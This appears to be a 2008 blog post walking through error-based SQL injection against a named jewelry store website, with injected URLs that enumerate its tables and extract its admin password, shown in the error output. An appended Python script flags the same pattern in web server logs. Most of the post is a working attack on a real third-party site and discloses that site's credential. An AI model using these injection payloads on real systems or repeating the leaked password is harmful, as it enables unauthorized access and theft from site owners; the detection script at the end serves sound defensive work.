Brace Your Self





November 12, 2008

ASP MsSQL Injection

c0li.m0de.0n version


Example: http://www.indiansilverjewelryonline.com/wholesale/product.asp?catid=4&subcatid=11

debugging
http://www.indiansilverjewelryonline.com/wholesale/product.asp?catid=4&subcatid=11 "and 1="

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/wholesale/product.asp, line 83

Next, inject the SQL.

The query: and 1=convert(int,(select top 1 table_name from information_schema.tables))--

so the URL becomes

http://www.indiansilverjewelryonline.com/wholesale/product.asp?catid=4&subcatid=11 and 1=convert(int,(select top 1 table_name from information_schema.tables))--

Then we look at the error that comes back:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'orders_whole' to a column of data type int.
/wholesale/product.asp, line 83

Here we have found one table name, orders_whole. We continue by looking for the next table.

The query: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('orders_whole')))--

http://www.indiansilverjewelryonline.com/wholesale/product.asp?catid=4&subcatid=11 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('orders_whole')))--

The error is:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'sysconstraints' to a column of data type int.
/wholesale/product.asp, line 83

Got it ;D We have now found the table sysconstraints. Let's look for another table.
The injected URL becomes

http://www.indiansilverjewelryonline.com/wholesale/product.asp?catid=4&subcatid=11 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('orders_whole','sysconstraints')))--

The error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'syssegments' to a column of data type int.
/wholesale/product.asp, line 83

That gives one more table, 'syssegments'.
Let's look for another table...

http://www.indiansilverjewelryonline.com/wholesale/product.asp?catid=4&subcatid=11 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('orders_whole','sysconstraints','syssegments')))--

The error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin' to a column of data type int.
/wholesale/product.asp, line 83

Whoa, we got the admin table :P
Having come this far, we go straight for the password... :D

The query: and 1=convert(int,(select top 1 pwd from admin))--

http://www.indiansilverjewelryonline.com/wholesale/product.asp?catid=4&subcatid=11 and 1=convert(int,(select top 1 pwd from admin))--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'mummy ' to a column of data type int.
/wholesale/product.asp, line 83

And there is the admin password: "mummy"
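
Seen from the server side, the requests above leave a recognizable trail: a numeric parameter carrying a convert(int,(select ...)) cast, INFORMATION_SCHEMA lookups, and HTTP 500 responses because the driver error is returned to the client. The following is an added example, not code from the original post, that flags this pattern in web server logs; the log field layout, the IP addresses, and the names classify and scan are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Constructed sample in a simplified IIS W3C layout (assumed field order):
# date time c-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2008-11-12 10:00:01 203.0.113.7 GET /wholesale/product.asp catid=4&subcatid=11 200
2008-11-12 10:02:10 198.51.100.23 GET /wholesale/product.asp catid=4&subcatid=11%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))-- 500
2008-11-12 10:02:31 198.51.100.23 GET /wholesale/product.asp catid=4&subcatid=11%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20(%27orders_whole%27)))-- 500
2008-11-12 10:03:05 198.51.100.23 GET /wholesale/product.asp catid=4&subcatid=11%20and%201=convert(int,(select%20top%201%20pwd%20from%20admin))-- 500
2008-11-12 10:04:00 203.0.113.9 GET /wholesale/product.asp catid=2&subcatid=5 200
"""

NUMERIC_PARAMS = {"catid", "subcatid"}  # assumption: both are integer ids
ERROR_BASED = re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\b", re.I)
SCHEMA_PROBE = re.compile(r"information_schema\.", re.I)

def classify(query, status):
    """Return finding labels for one request's query string and status."""
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # An id parameter should never contain anything but digits.
        if name.lower() in NUMERIC_PARAMS and not value.isdigit():
            findings.append("non-numeric:" + name.lower())
        # Forcing a string subquery into int is what leaks data via the error.
        if ERROR_BASED.search(value):
            findings.append("error-based-cast")
        if SCHEMA_PROBE.search(value):
            findings.append("schema-enumeration")
    # A 500 on a flagged request suggests the driver error reached the client.
    if findings and status == 500:
        findings.append("db-error-returned")
    return findings

def scan(log_text):
    """Group flagged requests by client IP: {ip: [(timestamp, path, labels)]}."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        date, time, ip, _method, stem, query, status = line.split()
        labels = classify(query, int(status))
        if labels:
            per_ip[ip].append((f"{date} {time}", stem, labels))
    return dict(per_ip)

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, len(hits), "flagged requests")
```

Several flagged requests from one address in quick succession, each with a 500 status, match the table-by-table enumeration shown in this post.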

© 2008 - 2013 keroco.blogspot.com